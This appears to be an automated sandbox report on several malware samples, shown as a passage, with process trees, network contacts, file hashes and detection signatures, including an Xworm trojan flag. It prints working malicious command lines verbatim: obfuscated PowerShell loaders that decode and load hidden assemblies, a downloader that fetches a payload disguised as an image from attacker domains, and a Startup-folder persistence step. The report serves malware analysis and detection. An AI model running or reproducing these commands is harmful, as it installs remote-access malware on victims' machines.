PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe
PID 1252 wrote to memory of 2060 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\notepad.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\loader.ps1

C:\Windows\System32\notepad.exe

C:\Windows\System32\notepad.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vxboda.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Wogaptd = Get-Content 'C:\Users\Admin\AppData\Local\Temp\vxboda.bat' | select-object -Last 1; $Bbvjyjl = [System.Convert]::FromBase64String($Wogaptd);$Osqqdzvqkq = New-Object System.IO.MemoryStream( , $Bbvjyjl );$Ooivncxsvx = New-Object System.IO.MemoryStream;$Ouqoommak = New-Object System.IO.Compression.GzipStream $Osqqdzvqkq, ([IO.Compression.CompressionMode]::Decompress);$Ouqoommak.CopyTo( $Ooivncxsvx );$Ouqoommak.Close();$Osqqdzvqkq.Close();[byte[]] $Bbvjyjl = $Ooivncxsvx.ToArray();[Array]::Reverse($Bbvjyjl); $Bjklpyasha = [System.Threading.Thread]::GetDomain().Load($Bbvjyjl); $Pldyxr = $Bjklpyasha.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jznltd.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Flmceaelwj = Get-Content 'C:\Users\Admin\AppData\Local\Temp\jznltd.bat' | select-object -Last 1; $Qpiedhffan = [System.Convert]::FromBase64String($Flmceaelwj);$Tlfdzhtvv = New-Object System.IO.MemoryStream( , $Qpiedhffan );$Oosvmvwadrd = New-Object System.IO.MemoryStream;$Ipxfr = New-Object System.IO.Compression.GzipStream $Tlfdzhtvv, ([IO.Compression.CompressionMode]::Decompress);$Ipxfr.CopyTo( $Oosvmvwadrd );$Ipxfr.Close();$Tlfdzhtvv.Close();[byte[]] $Qpiedhffan = $Oosvmvwadrd.ToArray();[Array]::Reverse($Qpiedhffan); $Uyqgmoqrr = [System.Threading.Thread]::GetDomain().Load($Qpiedhffan); $Premz = $Uyqgmoqrr.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wwtghi.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dsumix.cmd" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Lqctry = Get-Content 'C:\Users\Admin\AppData\Local\Temp\dsumix.cmd' | select-object -Last 1; $Gepinqdfw = [System.Convert]::FromBase64String($Lqctry);$Smjhpgfd = New-Object System.IO.MemoryStream( , $Gepinqdfw );$Ebvvkvbqat = New-Object System.IO.MemoryStream;$Ouefwyswci = New-Object System.IO.Compression.GzipStream $Smjhpgfd, ([IO.Compression.CompressionMode]::Decompress);$Ouefwyswci.CopyTo( $Ebvvkvbqat );$Ouefwyswci.Close();$Smjhpgfd.Close();[byte[]] $Gepinqdfw = $Ebvvkvbqat.ToArray();[Array]::Reverse($Gepinqdfw); $Tyossrcg = [System.Threading.Thread]::GetDomain().Load($Gepinqdfw); $Tzmchvhv = $Tyossrcg.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Epbiwzhzg = Get-Content 'C:\Users\Admin\AppData\Local\Temp\wwtghi.bat' | select-object -Last 1; $Pidhuf = [System.Convert]::FromBase64String($Epbiwzhzg);$Kfgkov = New-Object System.IO.MemoryStream( , $Pidhuf );$Rtzup = New-Object System.IO.MemoryStream;$Hvtlgiqv = New-Object System.IO.Compression.GzipStream $Kfgkov, ([IO.Compression.CompressionMode]::Decompress);$Hvtlgiqv.CopyTo( $Rtzup );$Hvtlgiqv.Close();$Kfgkov.Close();[byte[]] $Pidhuf = $Rtzup.ToArray();[Array]::Reverse($Pidhuf); $Ujrulpn = [System.Threading.Thread]::GetDomain().Load($Pidhuf); $Gkwzgehresm = $Ujrulpn.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"

Network

Country Destination Domain Proto
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 jdokds.duckdns.org udp
GB 57.128.155.22:8895 jdokds.duckdns.org tcp
US 8.8.8.8:53 22.155.128.57.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 52.111.229.43:443 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 91.65.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5np0u1fr.3cu.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\vxboda.bat

MD5 a27d0d05a470dc95f1c74c7861761e9f
SHA1 c4533a4822975c7a6316e375e365df82676dce76
SHA256 3efe939bbca5c286978f8695ddeda122222cac8aef1c53ab8a63007e5a3287b7
SHA512 7b3fb05433f58375e1d127f767ccd2cbc90cdce3651127db03d87867cf840002405aeaccebf16c2d1f6242e56b9fc8932210c7f194ecb8204ff1c3616b45409f

C:\Users\Admin\AppData\Local\Temp\jznltd.bat

MD5 b73dc1ad88598d67c62f694c382be267
SHA1 7a5574b1e22e860e71c47104a588cfbcc78f9a63
SHA256 6ee076cc6d3be85fbb81e4d42276af43fcf3be7445de87d6e0497c9993ca2687
SHA512 d3afb4291432110a063be5506c4d96a82247fa666338e9ce02f19cb3d112118d65a1c1e83947cbe914f10c484f196172cf032e015b4ab00b3a08cca0c1aab675

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4267fc1e87ee23aeb8b9a7d0497091c5
SHA1 59ddae7dc44b8317ff933ad113493eb1644c52c0
SHA256 ff7daa872dda2a5fc4ce7a687bb4193774abb607d489887ffdbbd0ef71bc0d8d
SHA512 1d1b048dc3f01680f4049c23db8e4450f2d59a1174184a340e712d6e4340b3ab6191a254986c98743c5374a693733bfa6ff255b62a7b43809bd79c0804be2beb

memory/376-71-0x0000000005F50000-0x0000000005F6E000-memory.dmp

memory/3268-72-0x0000000006410000-0x000000000645C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wwtghi.bat

MD5 7834dbd67492fa350447dbd5debda5fc
SHA1 e008dff36158beb0425d32036d9f65d5653184bd
SHA256 d96f10a2672eb846ecb66d836dfe82933aca60094a367a90eee3aac0444a5573
SHA512 02ac02dfd61f1ce96f79899523aedd6efd26a269bfecf4507ad3008fa384f9f2d9c9fac71664f7f0b1f6bdf6a397ee6757c199c0971f0b9803409f0c48d7206a

C:\Users\Admin\AppData\Local\Temp\dsumix.cmd

MD5 f95dfe17a283dbb9301936821032b9a4
SHA1 357edc773d07784e7fd295c2b273305994789fc4
SHA256 22d6876c6b04fb74787a5e0803e62ed9c30cd05340ac0eb18ca358c916c3165c
SHA512 2a423ab3c92945600ef1ecc73e0e5ae46c69971b812985b46706b2447b7da1a259a3411e98ffea034aa6cc0880c154bd804785484bf9355357815d1c066d8de8

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d4d8cef58818612769a698c291ca3b37
SHA1 54e0a6e0c08723157829cea009ec4fe30bea5c50
SHA256 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0
SHA512 f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

Analysis: behavioral12

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

149s

Max time network

157s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\monitors.ps1

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\monitors.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 145.136.73.23.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp

Files

memory/2280-0-0x00000174EB780000-0x00000174EB7A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_klazp0bt.lvc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral26

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240412-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4092317236-2027488869-1227795436-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.Acddgoi/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adobe.vbs'"

Network

Country Destination Domain Proto
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 172.67.203.108:443 nanoshield.pro tcp
US 8.8.8.8:53 108.203.67.172.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 23.53.113.159:80 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp

Files

memory/2116-0-0x00000230643E0000-0x0000023064402000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_omfb5zsh.ke4.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 48874fdc03476cb442d506f5bb796f70
SHA1 2dedcc271d935fe842f7cb4cc03873b6f688d29d
SHA256 15717634eff02490a9e8a4606a3cc8d61876a9efa01b42d6c8bf442bcf8718e0
SHA512 31b5539304c0ad1f781407a60ff019c30192b2fe3e7bd64bf7dc3d5a9263eae6874c8ef960998900d1322d358e38f9eadba40945958fb6ff7719cd1a24644671

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/1464-49-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5caad758326454b5788ec35315c4c304
SHA1 3aef8dba8042662a7fcf97e51047dc636b4d4724
SHA256 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA512 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

memory/2116-52-0x00007FFC5ACB0000-0x00007FFC5B771000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240221-en

Max time kernel

122s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fresh.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2972 set thread context of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
PID 2972 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2584 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2972 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\fresh.exe C:\Windows\SysWOW64\cmd.exe
PID 2652 wrote to memory of 2588 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
